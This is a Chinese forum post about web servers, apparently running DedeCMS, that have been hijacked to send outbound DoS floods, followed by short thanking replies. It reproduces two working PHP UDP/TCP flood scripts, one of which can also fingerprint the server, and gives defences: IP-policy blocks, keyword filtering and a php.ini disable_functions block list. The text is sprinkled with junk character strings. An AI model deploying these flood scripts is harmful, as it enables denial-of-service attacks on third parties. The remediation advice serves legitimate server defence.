找回密码
 加入怎通
查看: 1609|回复: 4

[原创] 服务器php对外发包引起崩溃的解决办法

[复制链接]
商摆小路 发表于 2012-06-12 13:06:58 | 显示全部楼层 |阅读模式
  服务器php对外发包引起崩溃的解决办法paopao最近老听人说,php对外发包,引起服务器崩溃或被机房查封,今天闲着无事和大家一起分享paopao我总结的DEDECMS php对外发包引发服务器崩溃的终极解决方法,希望可以帮助大家解决服务器问题,让网站运行的更好  _' T: o9 W1 }. Z
  一。php对外发包分析) w, v4 `8 `$ q
  用php代码调用sockets,直接用服务器的网络攻击别的IP,常见代码如下:
6 ?  ~" Y. E5 J) U  以下是代码片段:
( e- y7 o! m% @5 j2 P  $packets = 0;" [) ?! H- ]/ b( K
  $ip = $_GET[\'ip\'];
, s. R. ]6 W1 W) H5 s. o" B. Y  M9 }  $rand = $_GET[\'port\'];
8 O5 g& M' T3 f3 i: j! S3 h$ Z  set_time_limit(0);0 c3 U" e& h8 E( x. t) D6 S4 i
  ignore_user_abort(FALSE);
2 O( ^  D! E2 Z, \  u3 W  $exec_time = $_GET[\'time\'];sbxl-201206128 K, @$ o3 @# R& s5 r/ v
  $time = time();
: r, ^& I. f0 k$ `1 U1 e  print \'Flooded: $ip on port $rand
7 a6 z" i' O; [: Z! l" B  \';
& s( m, Z9 D, I/ {! J7 S" h7 j  $max_time = $time+$exec_time;: \2 U6 S, e$ {" Z+ l% Z- f
  for($i=0;$i<65535;$i++){
1 U  K% Q* r1 b' |9 x  $out .= \'X\';" l! w/ d- i" e& ?, i, G. _
  }
+ q9 T; b* j. R$ l3 ?  while(1){
# d; Z4 |1 R( O- V4 [  $packets++;
/ X9 _" P0 c* A# J% b' k  if(time() > $max_time){, y1 m5 |+ b8 J( v$ J
  break;
# Q7 G( ]# D/ F& |) ^  }. I1 F( X; y$ y% w, F  w
  $fp = fsockopen(\'udp://$ip\', $rand, $errno, $errstr, 5);1 d) G" l! L: v+ t, U
  if($fp){
8 f: ]" a: g7 H3 C# b  fwrite($fp, $out);4 ?5 g. K; J% t6 f6 }
  fclose($fp);' r6 q* Q7 |; D6 J7 [
  }
2 t! p5 Z$ C7 v- t0 v% ?  }
- h8 n9 }1 Y! u4 X  echo \'Packet complete at \'.time(\'h:i:s\').\' with
, K$ @. p( b% N" U  u  $packets (\' . round(($packets*65)/1024, 2) . \' mB) packets averaging \'., c) V% T% F- U8 K' ~
  round($packets/$exec_time, 2) . \' packets/s ;
' y4 _2 j" f: `# o! N$ n' Z  ?>3 P) g3 ^1 @, |0 v
  二。表现特征
2 S) R: Q  `4 Z' r1 n4 I4 x  一打开IIS,服务器的流出带宽就用光-----就是说服务器不断向别人发包,这个情况和受到DDOS攻击是不同的,DDOS是服务器不断收到大量数据包.
4 a) Z1 A# |/ B6 x' [  近期由于DEDECMS出现漏洞而导致大量服务器出现这个问题.
5 _, n. F, N- x$ Y3 p  如何快速找到这些站?
  K3 C6 H6 A2 X9 M5 R5 s# e1 O  你可以打开日志" o+ P* M0 e  m1 s; J; m
  C:\Windows\System32\LogFiles\HTTPERR\httperr...log,打开今天时间的文件,9 d5 t3 @# R0 q
  里面有类似这样的记录:
$ e; ]. F7 o% v) S  2012-04-26 06:37:28 58.255.112.112 26817 98.126.247.13 80 HTTP/1.1 GET /xxxx/xxxxxx.php?host=122.224.32.100&port=445&time=120 503 783 Disabled 30_FreeHost_17 J7 P) u5 \$ B& x! {; S& }. \/ {
  最后三项783 Disabled 30_FreeHost_1* _: f5 V+ ?! [# y
  783就是这个站在IIS中的ID
$ ?, E$ D0 ?* {& F  Z# o0 M( _1 G+ L  30_FreeHost_1就是所在池
5 e: z( Z! h% M. n( v3 r" W* C7 r8 p  三?解决办法, k' `) ]8 k1 V" O0 \' Q* e
  1.按上述找到这个网站后停止它.或停止池,并重启IIS.  P. r: }9 B* g- ]4 d
  2.在IP策略,或防火墙中,禁止所有udp向外发送
/ T& W# A" I) Z/ n  d' x  在星外最新版本的安全包中,已带有4.0版本的IP策略【下载safe包】,您导入后就直接可以限制了外发的UDP包?下载这个包,之后导入安全策略?但这个策略并没有关闭DNS端口,部分攻击还是有效.
; U7 B4 h) V9 y  r  为了解决这个问题,你也可以调整IP策略,限制udp只能访问特定的DNS服务器IP,如8.8.8.8,除非黑客攻击这个IP,不然攻击也是无效的,你可以在网卡DNS中设置一个你才知道的DNS IP,并且不要公开,然后调用IP策略中的udp open部分就可以解决.(打开IP策略的属性,双击open,将open中的两条udp记录删除任意一条,在保留的这条中,双击,改成 地址 从源地址 任何地址 到目标地址'特定IP 这个IP就是设置为你自己的DNS IP,如8.8.8.8' 保存后就行了)/ B2 c2 V0 y( w2 W6 v
  在2011-4-27,我们上传了新的安全包,里面有一个'星外虚拟主机管理平台IP策略关闭所有UDP端口用.ipsec'文件,您可以导入它并启用,就可以关闭所有udp端口,就可以完全防止这类攻击,但是,这个策略由于关闭了DNS端口,会造成的这台服务器上无法用IE访问任何域名,因此,用户的采集功能也就用不了.(同样,如果在主控网站上用了这个策略,就会造成的受控自检不通过,因为解析不了域名,另外,部分用户反映此策略会造成的mysql不正常)7 X$ n( I! [6 Y# w  [
  3.用一流信息监控,在SQL拦截及网址拦截中,拦截port=这个关键词(其他关键词可以删除.)0 }- |; V) M3 F! H( R
  4.也可以直接禁止上面的代码,如改win\php.ini后重启IIS
: @/ J. H' c6 f; L% R  ignore_user_abort = On; X2 `8 R7 V0 w- |* ]
  (注意前面的;号要删除)
6 Z% q! s; b3 C/ _- O( N) `  disable_functions =exec,system,passthru,popen,pclose,shell_exec,proc_open,curl_exec,multi_exec,dl,chmod,stream_socket_server,popepassthru,pfsockopen,gzinflate,
1 ^( \8 [8 ]: c  c  在后面加上+ ?, v0 e9 m/ y! C
  fsockopen,set_time_limit
* v" u3 \, a* }( l0 j5 j( F" S+ `# j  但这样会造成很多php程序都不正常.
5 P% y6 p& @& i, L! i& N' C# C! c  另外,这也表明你的服务器安全做得不错,如果能入侵.黑客就直接提权了,还DOS做什么?
; K) H* e7 a5 K' h- \$ _  近期已有新的基于TCP攻击的PHPDDOS代码如下:9 v( r# C6 t  X3 d3 I- `
  以下是代码片段:$ p6 F# ]$ p9 u" n* N, e
  set_time_limit(999999);$ u" v+ x0 N6 \8 N" a9 }! c
  $host = $_GET['host'];& U, D! c( y5 n& X+ l3 m+ C  R
  $port = $_GET['port'];
9 E# l+ ]  M7 F- u2 e! c- E+ R  $exec_time = $_GET['time'];% n9 H5 R$ ]# K( l8 W
  $packets = 64;
' K8 m$ K" b3 l) `( Q  ignore_user_abort(True);; k, ^1 l3 c) I
  if (StrLen($host)==0 or StrLen($port)==0 or StrLen($exec_time)==0){2 ~. ]7 Y9 b  c, I4 z+ k; q
  if (StrLen($_GET['rat'])<>0){$ K6 d% }8 L0 f$ B
  echo $_GET['rat'].$_SERVER['HTTP_HOST'].'|'.GetHostByName($_SERVER['SERVER_NAME']).'|'.
- q, P3 O; q$ `+ Z2 Y4 ?  php_uname().'|'.$_SERVER['SERVER_SOFTWARE'].$_GET['rat'];
, B! B/ W8 F& I0 w3 D! u  exit;4 l/ n: I( }, |- z; O
  }
7 @& x5 o  a' n0 w. z$ `5 s  c  exit;; E, u: d3 r' x
  }
3 g" B9 H; X5 h  $max_time = time()+$exec_time;% y9 o' u  n8 A$ H9 n
  while(1){  B' X/ i4 }% T( `1 {; ]
  $packets++;) H9 w. b" `% M1 X) {: b4 r5 M
  if(time() > $max_time or $exec_time != 69){) v: x* w* a& f
  break;
9 K$ A1 D9 F6 O  }$ o1 q2 U% X9 v. l& \
  $fp = fsockopen('tcp://$host', $port, $errno, $errstr, 0);
: i. u. }4 ]- t/ w. P9 C: n: ~  }
) x; D! ]$ J7 ]2 t( W  ?>
' ]" h# a) r" q  同样,可以采有以下解决办法:/ \6 k. t9 g, \0 I
  1.也可以直接禁止上面的代码,如改win\php.ini后重启IIS
% a! m! z0 ^9 N3 }7 q  ignore_user_abort = On' k; _) w* ?, \+ Q  k4 s. N, c  e
  (注意前面的;号要删除)
) H4 o8 B$ u. a, H' K  disable_functions =exec,system,passthru,popen,pclose,shell_exec,proc_open,curl_exec,multi_exec,dl,chmod,stream_socket_server,popepassthru,pfsockopen,gzinflate,
0 |6 `5 r/ X2 n# h3 z  在后面加上' m4 A" g" z# z) D
  fsockopen,set_time_limit- e, T0 c/ c5 R6 @/ z
  但这样会造成很多php程序都不正常. 如果您是IDC,给客户提供空间的,禁用函数可能导致客户程序无法运行,所以一般不要用此办法& t7 [( ?% Q. V' i( K" R
  2.在IP策略中禁止所有外访的TCP数据包,但这样会造成的采集功能无效,也不能用在主控服务器上?1 Z7 G: I$ J. t. _# ^9 w- C
  3.在服务器要用关键词tcp:或udp:搜索所有php类文件,找到攻击文件,删除它?
& \( R7 K( l! v6 D) m4 e, E$ u. Y        文章出自医院网站优化 http://www.ahyyqing.com,转载请注明出处。6 J, H8 d; Q$ R2 v+ o

评分

参与人数 1ZZ币 +40 收起 理由
TONY + 40 这个很受用,我们也遇到了这个问题!

查看全部评分

回复

使用道具 举报

TONY 发表于 2012-06-12 13:39:53 | 显示全部楼层
很好 感谢分享啊
回复 支持 反对

使用道具 举报

幸福的蚂蚁 发表于 2025-11-10 20:26:34 | 显示全部楼层
分析得很透彻,很多细节都说到点子上了~
回复 支持 反对

使用道具 举报

DAIV 发表于 2026-02-17 01:26:21 | 显示全部楼层
楼主太厉害了,整理得这么详细,必须支持
回复 支持 反对

使用道具 举报

286888037 发表于 2026-03-31 17:08:47 | 显示全部楼层
完全赞同,我也是这么认为的,英雄所见略同~
回复 支持 反对

使用道具 举报

    您需要登录后才可以回帖 登录 | 加入怎通

    本版积分规则

    QQ|手机版|小黑屋|网站地图|真牛社区 ( 苏ICP备2023040716号-2 )

    GMT+8, 2026-6-12 18:13 , Processed in 0.161432 second(s), 33 queries , Gzip On.

    免责声明:本站信息来自互联网,本站不对其内容真实性负责,如有侵权等情况请联系420897364#qq.com(把#换成@)删除。

    Powered by Discuz! X3.5

    快速回复 返回顶部 返回列表